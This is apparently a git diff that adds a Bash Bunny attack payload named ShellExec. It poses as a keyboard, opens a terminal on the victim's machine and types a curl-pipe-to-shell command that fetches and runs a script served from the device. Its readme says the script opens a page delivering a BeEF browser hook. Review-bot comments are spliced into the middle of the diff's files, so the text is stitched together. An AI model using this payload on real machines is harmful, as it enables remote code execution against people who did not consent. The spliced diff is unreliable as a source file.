diff --git a/payloads/library/ShellExec/evil.sh b/payloads/library/ShellExec/evil.sh
new file mode 100644
index 00000000..5b355e78
--- /dev/null
+++ b/payloads/library/ShellExec/evil.sh
@@ -0,0 +1,6 @@
+!#/bin/bash
+
+# opens browsers to the bunny's index.html page
+
+[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
+[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1
diff --git a/payloads/library/ShellExec/hook.js b/payloads/library/ShellExec/hook.js
new file mode 100644
index 00000000..8454efc5
--- /dev/null
+++ b/payloads/library/ShellExec/hook.js
@@ -0,0 +1 @@
+alert('This is where your evil JavaScript file would go')
diff --git a/payloads/library/ShellExec/index.html b/payloads/library/ShellExec/index.html
new file mode 100644
index 00000000..c026f1ea
--- /dev/null
+++ b/payloads/library/ShellExec/index.html
@@ -0,0 +1,12 @@
+
+
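Review bot: The first line of evil.sh reads `!#/bin/bash`, with the two shebang characters transposed, so it is not a shebang and a shell reading the file treats it as an ordinary command line; it should be `#!/bin/bash`. The readme added in this same commit lists the fetched script as `evil.py`, which does not match this file's name, so one of the two needs correcting. The address `172.16.64.1` is hard-coded on both `uname` lines while payload.txt uses `$HOST_IP`; a comment such as `# must match HOST_IP from bunny_helpers.sh` would record that dependency.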
+
+
+
+
+Nothing to see here!
+
+
+
+
+
diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt
new file mode 100644
index 00000000..970f723f
--- /dev/null
+++ b/payloads/library/ShellExec/payload.txt
@@ -0,0 +1,49 @@
+#!/bin/bash
+
+# Title: ShellExec
+# Author: audibleblink
+# Target: Mac/Linux
+# Version: 1.0
+#
+# Create a web server on the BashBunny and forces
+# the victim download and execute a script.
+#
+# White | Ready
+# Ammber blinking | Waiting for server
+# Blue blinking | Attacking
+# Green | Finished
+
+LED R G B
+ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+
+source bunny_helpers.sh
+
+# switch to payload directory
+cd /root/udisk/payloads/$SWITCH_POSITION
+
+# starting server
+LED R G 500
+python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log &
+
+# wait until port is listening
+while ! nc -z $HOST_IP 80; do sleep 0.2; done
+
+# attack commences
+LED B 500
+
+Q GUI SPACE
+Q DELAY 300
+Q STRING terminal
+Q DELAY 100
+Q ENTER
+Q DELAY 2000
+
+# Q ALT F2 # swap with block above for linux
+# Q DELAY 100
+
+Q STRING curl "http://$HOST_IP/evil.sh" \| sh
+# in case curl isn't installed
+# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
+Q ENTER
+
+LED G
diff --git a/payloads/library/ShellExec/readme.md b/payloads/library/ShellExec/readme.md
new file mode 100644
index 00000000..3caa2bf8
--- /dev/null
+++ b/payloads/library/ShellExec/readme.md
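Review bot: The `cd /root/udisk/payloads/$SWITCH_POSITION` line in payload.txt is unquoted and its result is never checked, and the next step starts an HTTP server that serves the current directory on port 80; if the `cd` fails, the server exposes whatever directory the shell was already in to the attached host. I would change it to `cd "/root/udisk/payloads/$SWITCH_POSITION" || exit 1`. `server.log` is also written into the served directory, so it is retrievable over HTTP, and the background server is left running after `LED G`; writing the log elsewhere and stopping the server at the end would limit what stays exposed. The header comment spells the LED state `Ammber`, which the readme gives as `Amber`.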
@@ -0,0 +1,34 @@
+# ShellExec
+
+Author: audibleblink
+Version: 1.0
+
+## Description
+
+Serves malicious scripts or web pages from the Bunny and forces
+victims to curl and execute those scripts. Scripts can also force
+browsers to open a url on the bunny to do things like serve BeEF
+hooks.
+
+## Configuration
+
+evil.py - script that is fetched with DuckyScript
+(provided script opens a web page that serves a BeEF hook )
+
+hook.js - the aforementioned BeEF hook
+
+index.html - BeEF hook delivery page
+
+## Requirements
+
+Just plug and play
+
+## Status
+
+| LED | Status |
+| --------- | ----------- |
+| White | Ready |
+| Amber blinking | Waiting for server |
+| Blue blinking | Attacking |
+| Green | Finished |
+